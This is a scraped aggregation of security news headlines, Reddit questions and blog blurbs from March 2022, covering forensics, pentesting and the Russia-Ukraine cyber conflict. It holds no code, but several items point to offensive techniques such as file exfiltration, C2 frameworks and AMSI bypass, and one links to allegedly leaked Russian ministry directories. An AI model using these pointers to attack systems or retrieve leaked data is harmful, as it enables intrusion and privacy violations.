    I mean if the website forced a download of a file, sorry, no force thing. I noticed today that my hosts file was modified and was 127.0.0.1 suspiciousaddress. I checked the address on web scanners and said clean but that it had an ascii file, small, 170 characters, maybe a script? I by mistake put the address on google and the browser tried to open it, I closed it and my internet crashed as soon as I did that so now I'm worried. I also tried to enter using the ip and not the dns and got a message but didn't write it down. I'd like to check if the website is downloading something on my pc, some script etc, or what else can I do? Thanks in advance. submitted by /u/HeroOfTheNorthF [link] [comments]
    Malware implication if I run VM via gnome boxes?
    I would like to check if malware could affect my main system (Silverblue), if I run windows or other linux distro via gnome boxes - could malware get into main os? If it could get affected, then would having amnesic help? I was reading how in some cases paging/ram could get copied into hard disk. So not sure. submitted by /u/AtomicFurion [link] [comments]
    What's your favourite Sandbox ?
    Hi guys, I'm going to build a simple home lab on a budget. Need recommendations regarding an easy to deploy sandbox. What's your favorite sandbox and why? submitted by /u/breadcrumb2000 [link] [comments]
  • Open

    SecWiki News 2022-03-03 Review
    From cognitive warfare in cyberspace to large-scale network-crippling attacks on Russia by ourren; Analysis of the China Mobile GS3101 optical modem — a switcheroo by ourren; Learning Java security with Sanmeng: semi-automated bug hunting by ourren; TA402 continues to launch attacks against Middle East targets by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Manipulating User Passwords Without Mimikatz
    There are two common reasons you may want to change a user’s password during a penetration test: You have their NT hash but not their plaintext password. Changing their password to a known plaintext value can allow you to access services in which Pass-the-Hash is not an option. You don’t have their NT hash or... The post Manipulating User Passwords Without Mimikatz appeared first on TrustedSec.
  • Open

    FreeBuf Morning Report | Open-source PJSIP library affected by critical vulnerabilities; MIIT publishes regulations restricting app download behavior
    Against the backdrop of the escalating Russia-Ukraine conflict, the US Senate unanimously passed the Strengthening American Cybersecurity Act.
    How to prevent phishing emails? S/MIME email security certificates to the rescue!
    Phishing (pronounced like the English word "fishing", also known as phishing attacks) sends deceptive emails to victims while impersonating banks or other well-known institutions, luring recipients into providing their sensitive information (such as usernames, passwords, ATM transaction PINs or
    Rising risk! Data leaks and shadow assets expand the enterprise cyberattack surface
    Data leaks and shadow assets are the largest sources of cyberattacks facing large organizations worldwide.
    Gamers beware! Hackers are spreading malware that can hijack social media accounts
    It mainly intrudes via the Microsoft Store in the form of trojanized game applications.
    Russia considers a cyberattack on its satellites an act of war, but invading Ukraine doesn't count
    A hacker group affiliated with Anonymous announced it had shut down the control center of Russia's space agency.
    Cyberwarfare becomes the "fifth battlefield": these figures show the state of Ukraine's networks
    Russian President Putin announced a special military operation in the Donbas region of eastern Ukraine. Beyond the actual hot war, the "cyberwar" between Russia and Ukraine had in fact begun long before.
    MITRE releases Adversary Engagement Framework v1 and a series of implementation guidance documents
    Adversary engagement guidance and recommendations for active defenders
    CIS 2021 Conference Spring Edition begins offline recording: gathering in spring to talk security
    On the morning of March 2, the two-day "CIS 2021 Cybersecurity Innovation Conference Spring Edition" began offline recording at the Shanghai Baohua Marriott Hotel.
    New tricks! A new trend in gambling platform payment channels: virtual currency becomes the "new favorite"
    Virtual currency has become the "favorite" deposit and withdrawal channel for gambling platforms; third-party top-up methods such as WeChat and Alipay, which used to dominate, have gradually disappeared from some gambling platforms.
    HTTP and HTTPS: six common questions
    Some people have questions about HTTP and HTTPS. We have collected several common questions and answered them, hoping to help you as much as possible and deepen your understanding of HTTP and HTTPS.
    APT29 attacks embassy-related personnel using the pandemic as a lure
    Recently, APT29 shifted targets again, turning its attention from SolarWinds to embassies.
    New variant of the modular banking trojan IcedID surfaces
    IcedID is a modular banking trojan first disclosed in 2017 and one of the most prevalent malware families of recent years.
    Expert content | Shared data in the financial industry is complex; how can the foundation of data security be strengthened?
    Data classification and grading can effectively promote the secure sharing of financial data between institutions and within the industry, and helps unlock and realize the value of financial-industry data.

  • Open

    IDOR delete any Tickets on ads.tiktok.com
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1475520 - Bounty: $5000
    Open Redirect TO Stealing aadvid
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1378533 - Bounty: $500
    Reflected XSS on www.pornhub.com and www.pornhubpremium.com
    Pornhub disclosed a bug submitted by wh0ru: https://hackerone.com/reports/1354161 - Bounty: $750
  • Open

    4300$ Instagram IDOR Bug (2022)
    Hello everyone! Today I'm going to explain how I found a 4300$ IDOR Bug on Instagram. Continue reading on Medium »
    My personal favourite top 20 hacking tools.
    1. Nmap (Network Mapper) Continue reading on Medium »
    What is John the Ripper (JTR)? How to use JTR?
    What is John the Ripper? Continue reading on Medium »
    How did I find Directory Traversal attack using GitHub
    Hello, Continue reading on Medium »
    Bug Bounty — How to approach Vulnerabilities ( PART 1 )
    Hello people, it’s me again. In most cases, with automated tools, you can possibly find low level security bugs i.e most likely Blind XSS… Continue reading on Medium »
    IDOR in support.mozilla.org through Code Review
    I was trying to improve my static analysis code, specifically django apps, so I decided to hack a random project in github. And I found… Continue reading on Medium »
    Community Newsletter — March 2022
    As the Pandora community continues to grow stronger with each passing day, we would like to take this opportunity to thank everyone for… Continue reading on Pandora Protocol »
    Are data practitioners the new (security) weakest link?
    Secrets in code Continue reading on CodeX »
    Business Logic Bug| Email Existing Bypass | Running 2 accounts with a single email
    Vulnerability Category: Business Logic Error Continue reading on Medium »
    Find bugs by Google dork method
    Cre : https://medium.com/@fcwdbrqmr/400-bounty-again-using-google-dorks-6dc8e438f017 Continue reading on Medium »
  • Open

    Could artifacts be missing from Magnet Axiom?
    Hi there, hoping some of you are Magnet Axiom users and may be able to help me with this conundrum I have *some nonessential information has been altered for protection*: I have received a Portable Case from someone who has full license to the platform. I understand how the Portable Case is created (via watching the Magnet tutorial videos). The Portable Case is supposed to contain the contents of John Doe's cell phone. Separately, I have Snapchat Returns for John Doe's Snapchat account, and as far as is known John Doe only owned the one aforementioned cell phone. In looking at the Artifacts in the Portable Case, there seem to be things missing. For example: The Portable Case is supposed to cover a time period of 01/01/2XXX through 05/15/2XXX. When comparing the Snapchat Returns > Snapchat Memories I am able to see a specific video file - I'll call it "Selfie A" - from 02/03/2XXX 08-48-56 UTC. But when looking at the Portable Case > CHAT > Snapchat Memories artifacts there is no corresponding artifact. There are other video artifacts from that same date and around that time, but not "Selfie A." There are many files I have identified with this same issue. So now the question: I will admit I have not had formal training on Axiom (nor am I a digital forensics professional by trade) so I am willing to withhold suspicion for now, but, is it possible that artifacts could appear from Snapchat Returns that were missed in Axiom? Maybe "Selfie A" was deleted from the phone so it doesn't appear in Axiom but it does appear in the Returns data from Snapchat? (I hate even typing that question because I know even "deleted" things can be forensically recovered but go with me here). Or, is it more likely that the "Selfie A" artifact is visible in the Snapchat Returns but not in the Portable Case because the creator of said Portable Case chose not to include the artifact? submitted by /u/mclaughlinkessell [link] [comments]
    Tips on the GDAT certification (SEC599)
    Hi all, I have just enrolled for the SEC599 (OnDemand) and will be going through the GDAT exam as well. Are there any tips which could help me prepare better and pass the exam? My intro - Have been into SOC and IR for 5+ years now, and this is going to be my first certification submitted by /u/Suchi-Bee [link] [comments]
    Pagefile/ Cache question
    Hey Guys I work in law and as you probably have experienced we are stunningly ignorant on computer forensics. When I have a bit of time I like to research various computer forensic things and evidence from browsers is quite fascinating to me. I have two questions that I'd love help answering. 1) I'm assuming that this is a stupid/ basic question but I read that pictures in the cache are copies of the original essentially and as such they would contain meta data like locations and so on, is that also correct for stuff in the pagefile? 2) I've messed around with the belkasoft software trial run to view the pagefile on my PC, the categories that the data is broken up into are fairly understandable browsers, instant messengers. And they contain images and urls. However there is a category called other files and I'm not sure what is contained in them? submitted by /u/curiousstudent99l [link] [comments]
  • Open

    Thought this might be of interest
    https://46.mangovideo.pw/contents/videos/ http://server217.mangovideo.pw/contents/videos/ https://177.mangovideo.pw/contents/videos/ https://68.mangovideo.pw/contents/videos/ https://server9.mangovideo.pw/contents/videos/ https://45.mangovideo.pw/contents/videos/ https://new.mangovideo.pw/contents/videos/ https://5.mangovideo.pw/contents/videos/ https://234.mangovideo.pw/contents/videos/ https://183.mangovideo.pw/contents/videos/ https://31.mangovideo.pw/contents/videos/ https://60.mangovideo.pw/contents/videos/ https://s10.mangovideo.pw/contents/videos/ https://183.mangovideo.pw/contents/videos/ submitted by /u/TiThelis [link] [comments]
    CALISHOT 2022-03: Find ebooks amongst 395 Calibre sites this month.
    submitted by /u/throwaway176535 [link] [comments]
  • Open

    If you change the SIM card, google will automatically add that number to your google account.
    A tech at Verizon put his personal SIM in my phone to see if it could support the network. I'm attempting to change from ATT to Verizon on my unlocked android phone. A little while later, a notification from google that his personal phone number has been added to my Google account(s), alongside my own phone #. Does this mean that you can access someone's Google account(s) by surreptitiously inserting a SIM into their phone, even if you don't have their pin# or severed finger? submitted by /u/Dougolicious [link] [comments]
    Ghosted after vulnerability disclosure
    I recently disclosed an unauthenticated RCE to a company that provides virtual network appliances, the process was going well and they patched the vulnerability, but upon my request for patch release/notes they ghosted me. I already have CVE numbers assigned but would like to have MITRE publish them but don't know what to do if the company is not being cooperative, anyone have any suggestions? submitted by /u/BasedThug [link] [comments]
    Should I pursue the OSCP certification?
    I have 6 years of experience as a software engineer, and recently started working as an Application Security Engineer doing mostly static and dynamic analysis of our apps. I have plenty of books and online courses to work through, and recently started tinkering with HackTheBox. I thought about pursuing the OSCP cert. Realistically with a full-time security job and other obligations I probably won't be able to commit all my spare time to this, so the 30/60/90 day lab access periods probably won't be enough time to finish the course. The 1 year long lab access is $2500, which is quite a steep price. I'm curious to know if the OSCP training will benefit me in a way that my job and HackTheBox won't. submitted by /u/cppnewb [link] [comments]
    ISO 27001:2021 GAP analysis
    Hi, I'm working for a company which is ISO 27001:2013 certified and I was asked to do a GAP analysis on the ISO 27001:2021 standard. So if there are any useful articles or any references, please share them. TIA submitted by /u/darkwolf-95 [link] [comments]
    Thoughts on Kaspersky AV/Anti-malware after recent events?
    Hey all, Wondering what your thoughts are on Kaspersky as an AV tool, and as a company given recent events. Do you think with all the independent reviewers that they could still be compromised by say KGB/Russian government? Sorry, not trying to be political, but the recent events can be directly tied to multiple netsec topics. submitted by /u/Fizgriz [link] [comments]
  • Open

    moodle 2nd order sqli 0-day
    submitted by /u/mufinnnnnnn [link] [comments]
    How to analyze malicious documents – Case study of an attack targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Guardio security team discovered an active network of sophisticated crypto attacks targeting the MetaMask wallet
    submitted by /u/oldrobgin [link] [comments]
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    submitted by /u/cyberbutler [link] [comments]
  • Open

    SecWiki News 2022-03-02 Review
    Closed-loop data security management practices for partners by ourren. For more of the latest articles, visit SecWiki
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    This post outlines techniques to exfiltrate files using curl and encode, encrypt, and save captured files using a custom Flask Web Server Continue reading on Maveris Labs »
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    My First Osint Challenge
    One fine day I was scrolling through tweets and my eyes caught a tweet that Dan Conn tweeted, an OSINT challenge on Oct 5, 2021 mentioning his… Continue reading on Medium »
    Maltego OSINT Tool Intro
    Maltego is a tool for OSINT and visual link analysis. It can pull data from multiple sources to explore the properties of entities and the… Continue reading on Medium »
    Working with your own data: tips and tricks to kickstart your analytical task
    Our recent articles mostly tell about Lampyre’s OSINT capabilities. This one will be different as it describes the data analysis side of… Continue reading on Medium »
  • Open

    Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization
    Scans of more than 200,000 infusion pumps on the networks of hospitals and other healthcare organizations found 75% had known security gaps. The post Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization appeared first on Unit42.
  • Open

    FreeBuf Morning Report | Ukrainian researcher leaks Conti ransomware source code; Apple disables core iPhone features in Russia
    Apple said that after Russia's attack on Ukraine it has stopped selling its products in Russia and restricted Apple Pay.
    Quickly locating cryptomining trojans!
    The most distinctive trait of a cryptomining trojan is very high CPU usage; viewing CPU status with the top command, you can see that the xmr process consumes a lot of CPU.
    What is an SDK, and how does it threaten our privacy?
    To date, 107 apps have not completed rectification, including 洋码头 (Ymatou) and 中公教育 (Offcn Education).
  • Open

    Exposing the Conti Ransomware Gang - An OSINT Analysis
    UPDATE: The following set of graphics aims to visualize the recently leaked Conti ransomware gang members' conversations. UPDATE: The following is a complete list of all the Bitcoin addresses used by the Conti ransomware gang members obtained using public

  • Open

    4 Weeks to prep for GCFA
    Is this even possible? I was given the material yesterday. I have some training under my belt, but overall still a noob when it comes to DFIR. Currently sitting through a 6 day course with a SANS instructor, but I feel like I am getting the exact same information from just reading the books. My experience in IT is less than 2 years and all training. Sec+ being my only previous cert. submitted by /u/SnooDogs3246 [link] [comments]
    ASK ALL NON-FORENSIC DATA RECOVERY QUESTIONS HERE
    This is where all non-forensic data recovery questions should be asked. Please see below for examples of non-forensic data recovery questions that are welcome as comments within this post but are NOT welcome as posts in our subreddit: My phone broke. Can you help me recover/backup my contacts and text messages? I accidentally wiped my hard drive. Can you help me recover my files? I lost messages on Instagram, SnapChat, Facebook, etc. Can you help me recover them? Please note that your question is far more likely to be answered if you describe the whole context of the situation and include as many technical details as possible. One or two sentence questions (such as the ones above) are permissible but are likely to be ignored by our community members as they do not contain the information needed to answer your question. A good example of a non-forensic data recovery question that is detailed enough to be answered is listed below: "Hello. My kid was playing around on my laptop and deleted a very important Microsoft Word document that I had saved on my desktop. I checked the recycle bin and it's not there. My laptop is a Dell Inspiron 15 3000 with a 256gb SSD as the main drive and has Windows 10 installed on it. Is there any advice you can give that will help me recover it?" After replying to this post with a non-forensic data recovery question, you might also want to check out r/datarecovery since that subreddit is devoted specifically to answering questions such as the ones asked in this post. submitted by /u/AutoModerator [link] [comments]
    Answering general digital investigation questions
    Last week we ran a stream about forensic hardware and got A LOT of general digital forensic questions. It might be interesting to anyone new to computer forensics. Use the chapter times in the video description to jump around. We also talk about hardware write blockers and forensic imagers. https://youtu.be/O1bZvGqmP1Y submitted by /u/DFIRScience [link] [comments]
    Incident Responder looking to transition into a digital forensics role
    Hello everyone! I have worked in infosec and IT for 6 years in incident response roles for companies ranging from startups to fortune 50. I currently work at a startup local cybersecurity firm where I am an incident response engineer and consultant. I handle everything on the IR side including ransomware cases, business email compromise, data theft, threat hunting, and compromise assessments. I also have my GSEC, GCIH, GCFE, and GCFA certifications. I love what I do, but I am burnt out. I’m tired of being on call 24/7/365, never being able to bring any of the criminals I work against to justice, and much more. My family and I are settling down, and I am interested in transitioning to a more traditional digital forensics role working on criminal cases. I want to have a more steady, stable case load, and actually see the results of my work helping bring people to justice. I was wondering if any of you have made a similar transition, and if there are any recommendations or insights that could help me make this switch. I have read the FAQ here and am looking for new jobs in this space, but would love to get some input from this community. Any thoughts? submitted by /u/horizon44 [link] [comments]
    What are some good triage tools for live MacOS and Linux systems?
    A customizable hash list is a must! Thanks submitted by /u/DHZX [link] [comments]
    Homework Help in HxD
    submitted by /u/Flaky_Tonight3305 [link] [comments]
  • Open

    Open Directories Kodi addon for version 19 Matrix?
    Anybody know where there is an updated version of the open directories addon for Kodi? We had an addon for Kodi version 18 Leia, but since that version relied on python 2, we now need an updated version for python 3. Or something similar. submitted by /u/studio222 [link] [comments]
    Collection of vintage video game and pc commercials
    http://ftp.kameli.net/pub/pkpvideos/ submitted by /u/inoculatemedia [link] [comments]
    Ministry of Economic Development of Russia Leaked by anonymous
    The sites seem to be down but I will provide the links in case they are back on. https://old.economy.gov.ru/minec/resources/ https://old.economy.gov.ru/wps/wcm/connect/economylib4/designElements/resources/ These are the tweets that link me there: https://twitter.com/youranonone/status/1498685800241934342?s=21 https://twitter.com/anonymous_link/status/1498607316836536320?s=21 submitted by /u/__babygiraffe__ [link] [comments]
  • Open

    Which is the efficient way to practice web application security?
    I read two books about web application security. Web Application Security: Exploitation and Countermeasures for Modern Web Applications Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities But I didn't practice enough. I have multiple options to practice it Port Swigger Web Security Academy bWAPP Vulnerability Disclosure Programs on HackerOne As I said I already read books about this topic, maybe I don't need to read PortSwigger Academy Articles. bWAPP is good but it consists of lots of vulnerabilities and I can't figure out how to prepare a work plan for that (Because of vulnerability count and expertise levels). VDPs on HackerOne are good because they are real-life challenges but I don't even know whether I am ready or not for testing real applications. I am open to any advice. submitted by /u/pacman0026 [link] [comments]
    Options for a malware sandbox with Internet access
    I am looking for a solution to work with and detonate potentially malicious files & malware. An isolated (from rest of LAN) malware sandbox .. with Internet access. I have been considering a Type 2 hypervisor such as VirtualBox running Windows 10 Pro. It seems if I go with this solution I may need a 2nd VM running a Firewall to ensure the Win10VM cannot spread malware to other devices on the LAN. Seeking input on other methods or options to build such an environment. submitted by /u/q_logsource [link] [comments]
    Help to improve AKS Pod's security
    Hello. I want to use the Azure Kubernetes environment for running Azure DevOps build agents. Besides, I tried to make the environment secure by following the principle of least privilege. As a result I have a Dockerfile and Pod definition which runs the container as an unprivileged user (nobody) on a read-only filesystem (except the /tmp and /azp paths). What else could be done to improve the environment's security? submitted by /u/groovy-sky [link] [comments]
    How do you organize your study?
    Currently I work as a SOC analyst. I do like studying and coding, so after work I usually study some stuff related to security, but from time to time I find myself starting new courses without finishing anything, and reading about different topics, but I can't focus, which wastes much time and effort. I'm not sure if anyone else faces the same issue and how I can focus more? submitted by /u/xoutisx [link] [comments]
    What are the biggest barriers stopping NetSec from going into Virtual Reality?
    Specifically, imagine a Virtual Reality tool that would allow you to navigate your entire network in a three dimensional space, to detect vulnerabilities and such. The first barrier that comes to mind would be cost of equipment, especially if organizations need to buy multiple headsets for their employees. But what other barriers do you foresee? VR is already pretty popular, so I'm surprised it's not already more adopted in this space. Disclaimer: I work for a VR startup in the NetSec space and we are trying to gather feedback from NetSec professionals. You can visit our website if you want to learn more, we are offering headsets in exchange for good user feedback. There's a survey link on our contact us page: https://valkure.com TIA submitted by /u/loshofficial [link] [comments]
    Entire infosec team replaced by... IT team?
    Anyone ever experience this? I'm the last technical infosec person left on a former team of ~14 people. Now we have replaced the entire infosec team with IT/non-infosec people, who are all basically entry-level in infosec, although they may have skills in other areas such as IT/cloud. I feel genuinely concerned because it's clear none of them have the skills, knowledge or experience to do anything in these job functions security wise. They are just having tons of random meetings to try and figure out what to do next, and not actually getting anything done. They've been "talking" about what to do for 9 months. It's starting to feel like a scam, and I'm having to hold people's hands with extremely basic scripting and technical tasks. At first it was cool, because I had the opportunity to mentor them, but NOTHING is getting done. What the hell is going on? submitted by /u/netipotty [link] [comments]
    Is whitelisting DNS zones to prevent DNS tunneling viable? Why is it not more common?
    I'm concerned about malware which uses DNS channels to communicate home. I'm thinking about ways to mitigate this threat for my servers, and the most obvious measure that comes to mind, is to have my DNS resolver block recursive lookups to zones which are not whitelisted. So, the plan is to (1) make my firewall block all DNS traffic from my server except to my own resolver, and (2) have my own resolver block all lookups to non-whitelisted zones. So e.g., a lookup to *.microsoft.com would be recursively resolved, but not a lookup to *.evildomain.com. When Google searching for ways to mitigate DNS tunneling, this is not a commonly suggested countermeasure. Most blogs and articles answer this question by referring to some expensive, "smart", enterprisey DNS filter. Is my countermeasure less easy than it sounds? If not, why is this countermeasure not more common? submitted by /u/engineerL [link] [comments]
    What is the most difficult part of being a SOC Analyst?
    Every job has pros and cons. What do you think about being a SOC analyst? A lot of people talk about stress and overworking. Maybe it's not worth being a SOC analyst? What do you guys think? submitted by /u/umuttosun [link] [comments]
    How to test our AV/EDR
    So if I remember well, a few years ago there were dedicated scripts and binaries to test if your AV/EDR works well, but I can’t find that anywhere. Do you have recommendations for that? What I’d like is to go a bit further than just compiling and running netcat/mimikatz… which would not involve running MSF modules at all. submitted by /u/EsreverEngineering [link] [comments]
    Not getting methodological approach to information audit. What are they trying to say?
    https://www.reddit.com/r/audit/comments/t47la5/not_getting_methodological_approach_to/ submitted by /u/whatusernameiscool [link] [comments]
    How do cybercriminals/"hackers" defend themselves?
    I've always been puzzled by the idea that hackers are vulnerable themselves? Like how can one say they are 100% defended from counter-attack? In any reading/research on cyber-defence I've ever done, the idea is you can never be 100% secure. Is it like an arms race of being "cleverer" than whoever might be on the counter-attack? Not sure if anyone can shed insight on this - thanks (editing post to say you can never be 100% secure, previously I had 10%) submitted by /u/mdgsec [link] [comments]
    Getting Started on Pentesting an IOT Device
    I'm relatively inexperienced at security and am trying to improve my skills. I have a custom made IOT device at home which I am trying to find vulnerabilities in and am looking for suggestions of what to investigate. I scanned with nmap using script=vulners. Only port 22 is open and there are a few vulnerabilities (OpenSSH 7.9p1) but nothing very promising as far as I can tell. Brute-forcing the SSH password using Hydra is also not very promising as it is fairly slow and I know the device has a reasonably complex password which is not in common password lists like rockyou. Any suggestions on other approaches to find vulnerabilities in the device? submitted by /u/MrKhutz [link] [comments]
    What is vulnerability sweeping?
    I was asked the question of what vulnerability sweeping is, but I can't seem to find a definitive answer for it, only definitions for vulnerability scanning. submitted by /u/pleaseweallneedhelp [link] [comments]
  • Open

    Protests against Russia’s attack on Ukraine + more
    the discursus Protest Analytics newsletter, March 1st, 2022 edition. Continue reading on discursus.io »
    The Ides of March: Fall of the Russian Bear?
    A critical update has come across my feed. The New York Times lost the lede in a story today. Continue reading on Medium »
    Verify Viral Photos with Reverse Search
    How to use Google Reverse Image Search to verify the source of photos from Ukraine Russian conflict. Continue reading on Medium »
  • Open

    5 New Vulnerabilities in PJSIP Multimedia Library, including RCE
    submitted by /u/SRMish3 [link] [comments]
    Triaging A Malicious Docker Container
    submitted by /u/MiguelHzBz [link] [comments]
    Multiple vulnerabilities found in voip monitor by an Ethiopian Security firm
    submitted by /u/nathanAbejeM [link] [comments]
    TeaBot is now spreading across the globe | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    submitted by /u/hardenedvault [link] [comments]
  • Open

    MySQL DUMPFILE
    This article aims to reinforce the importance of performing hardening and/or a security review before putting a server into… Continue reading on 100security »
    Analysis of a trojanized anydesk
    This blog provides a detailed analysis of anydesk application that has been trojanized and distributed from a ranked unofficial website… Continue reading on Medium »
  • Open

    Password Reset to Admin Access
    While testing a web application that used a web GUI over the top of an API, I noted the calls to the API were authorized with a JWT token… Continue reading on Techiepedia »
    What After 12th? as an Ethical Hacker.
    This is not an accurate path for an ethical hacker. Continue reading on Medium »
    No Rate Limiting on Forget Password Page (Email Triggering)
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Facing Issues with Nuclei upgrade??
    Few weeks back, I too faced the same situation. Tried multiple ways to upgrade my Nuclei version but it just got stuck at version 2.2.0… Continue reading on Medium »
    On the way to 2nd Bounty XSS and Apache server .
    Hello readers, in this post we'll look at XSS and Apache Server; further on the Apache server I will post another article. Continue reading on Medium »
  • Open

    SecWiki News 2022-03-01 Review
    A discussion of the BPF covert channel in "Bvp47: the top-tier backdoor of the NSA Equation Group" by ourren; DICOS: a method for discovering insecure code in the Stack Overflow community by ourren; An explanation of "BAS", the hottest security technology of 2022, by ourren. For more of the latest articles, visit SecWiki
  • Open

    A dynamic CNN model for identifying fake profiles in online social networks
    Online social networks (OSNs) are popular applications for sharing various kinds of data, including text, photos and videos. However, the fake-account problem is one of the obstacles facing current OSN systems. Attackers use fake accounts to distribute misleading information, such as malware, viruses or malicious UR
    Algorithmic recommendation management regulations take effect on March 1; algorithm filing system officially launched
    The Regulations specify that applying algorithmic recommendation technology means using algorithmic techniques such as generation and synthesis, personalized push, ranking and selection, retrieval and filtering, and scheduling and decision-making to provide information to users.
    Conti backs Russia; a Ukrainian member publishes its internal chat logs
    Right after the Conti ransomware group chose to side with Russia, a Ukrainian member leaked more than 60,000 messages from Conti's internal chats.
    FreeBuf Morning Report | Insurance giant AON hit by a cyberattack over the weekend; Moscow Exchange knocked offline by a cyberattack
    Microsoft revealed that, hours before the invasion, Ukrainian entities were targeted by previously undetected malware called FoxBlade. The Microsoft Threat Intelligence Center (MSTIC) continues to investigate attacks against...
    Insurance giant AON hit by a cyberattack
    AON disclosed that it suffered a cyberattack on February 25, 2022; beyond stating that the attack occurred and affected a limited number of systems, AON provided no further details in its report.
    Toyota halts production at its Japanese plants after a supplier suffers a cyberattack
    Because Kojima Industries, the supplier of interior and exterior plastic parts for Toyota vehicles, suffered a cyberattack, Toyota suspended production at its Japanese plants from March 1.
    Cyber warfare has become the "fifth battlefield"; these data show the state of Ukraine's networks
    Cyber warfare has developed into a domain with the same standing as sea, land, air and space, and has been designated the "fifth battlefield".
  • Open

    Demonstration of how use Counter-Strike 1.6 as Malware C2
    If you're a malware operator who likes to Rush B and want to manage your victims while playing games, this is for you. https://www.youtube.com/watch?v=b2L1lWtwBiI&t=1s https://twitter.com/kaganisildak/status/1498585440680656896 submitted by /u/kaganisildak [link] [comments]
  • Open

    Session Fixation on Acronis
    Acronis disclosed a bug submitted by hatnare: https://hackerone.com/reports/1486341
  • Open

    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    Article URL: https://hardenedvault.net/2022/03/01/poc-cve-2021-26708.html Comments URL: https://news.ycombinator.com/item?id=30511060 Points: 2 # Comments: 0
  • Open

    Windows Exploitation Research
    Hi, I am starting Windows security research to understand how Windows internals work and how one can exploit them. If anyone is interested, he/she can DM me submitted by /u/i_whiteheart [link] [comments]
  • Open

    Samsung Encryption Vulnerability [pdf]
    Article URL: https://eprint.iacr.org/2022/208.pdf Comments URL: https://news.ycombinator.com/item?id=30510543 Points: 1 # Comments: 0

  • Open

    Essential Skills to be a SOC Analyst
    Hi all, This video covers what the essential mindsets are to be an effective SOC analyst. It covers WHAT the mindsets are, WHY they are relevant to a SOC analyst, and HOW these mindsets can be developed. This is far more important than technical skills which can be taught. So, if you are a ‘new’ or aspiring analyst, or an experienced senior analyst, or even if you are on the periphery of cyber security in IT or are just curious, this video will have something for you. Happy Cybering! https://youtu.be/HOFfYUd7DbE submitted by /u/SyPy [link] [comments]
    how to deal with phishing email in a big company?
    I'm a new graduate and I had a job interview for a SOC analyst position. One of the questions that kinda confused me is "how do you identify and deal with phishing emails?". First I answered with the basic clues: weird email address; unknown domain; bad grammar/spelling; no asking for sensitive data; no shady URLs/files; and use plugins to analyse the emails. But they told me what if the email seems perfect, like a gmail domain, good spelling and formatting and no URLs or files attached. In my mind I'm thinking so how is this a phishing email if there is nothing suspicious in it. But I still tried to answer, saying that you can teach your employees to be aware of such emails and to report them to the security team in case they find a suspicious email. They answered what if the company has thousands of employees, how is the security team gonna deal with potentially hundreds of emails from the employees. At this point I got nothing else to say, what am I supposed to answer in this situation? thanks. submitted by /u/Dalleuh [link] [comments]
    Third party library license risk with Single Page Applications
    Many open source licenses have different rules depending on if the library is used with a SaaS product or an externally deployed product. Does using an open source library within a Single Page Application architecture mean the library is now deployed to the user's browser and thus is externally deployed? submitted by /u/jrminty [link] [comments]
    Struggling to learn networks,can i learn it through programming and GNS3?
    Hi, so on my last infosec interview the guy told me to study more networks, and he suggested studying the content of Network+. I am trying to learn from Mike Myers's course but struggling badly. There are a lot of theories here and I keep missing a lot of points. So I want to learn it more practically and in parallel learn the theories. I am good with programming and I have GNS3. So my question: can I learn networking and Network+ content through network programming and GNS3? submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    What is a Google Dork and how is it used?
    OSINT techniques Continue reading on Medium »
  • Open

    The (Mis)Use of Artifact Categories
    Very often in DFIR, we categorize artifacts in an easy-to-understand and easy-to-digest manner, as using or relying on these categories often helps us navigate our investigations. There are also times when we reduce those artifacts to a level where they're easier to understand, and in doing so, the categorization of the artifact isn't quite accurate. As such, it's necessary now and again to go back and take a look at that categorization to determine if it still holds, or if it truly served the community in the manner intended. SPOILER ALERT - TL;DR  Within the DFIR community, we should not be hanging investigation findings on single artifacts in isolation. If there are gaps in data, they need to be recognized, understood and communicated. Do not spackle those gaps over with guesswork and assu…
  • Open

    Breaking Google’s ReCaptcha v2 using.. Google.. Again
    submitted by /u/n0llbyte [link] [comments]
    Rouge RDP: New Initial Access Technique via RDP Bypassing Clients/Servers/Security Vendors
    submitted by /u/ustayready [link] [comments]
    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Phishing
    In the digital world everyone uses smart devices for day to day activity. We're sharing a lot of information, and at the same time receiving many… Continue reading on Medium »
    BYPASS AMSI
    Cooking up our recipe with PowerShell and C# Continue reading on Medium »
  • Open

    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password.
    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password. submitted by /u/rvndomus3r2019 [link] [comments]
    Is there a way to find out whether the timestamp on a file has been modified?
    I know it's very easy to modify the "Date created" and "Date Modified" attributes of a file. Is there any way to know if these timestamps have been modified? Can I look at a list of dates modified? Any logs or tools? Before someone suggests it, backup won't help because the last VSS available is before the file was initially created. The file was created within the last 14 days, and I have reason to believe that the date has been modified. I'd really appreciate the help. submitted by /u/Serious_Mongoose_522 [link] [comments]
    Let's Talk About NTFS Index Attributes
    Good morning, It’s time for a new 13Cubed episode! Let’s revisit a critical NTFS artifact: NTFS Index Attributes (also referred to as $I30 files). We'll cover all of the information you need to know, and take a look at a new tool called INDXRipper. Episode: https://www.youtube.com/watch?v=x-M-wyq3BXA Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    microscopic aquatic animals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Files from Cleveland State Community College
    http://www.clevelandstatecc.edu/content/ submitted by /u/depressedclassical [link] [comments]
    1980s and early 1990s software
    http://cd.textfiles.com/dfeno1/ submitted by /u/depressedclassical [link] [comments]
  • Open

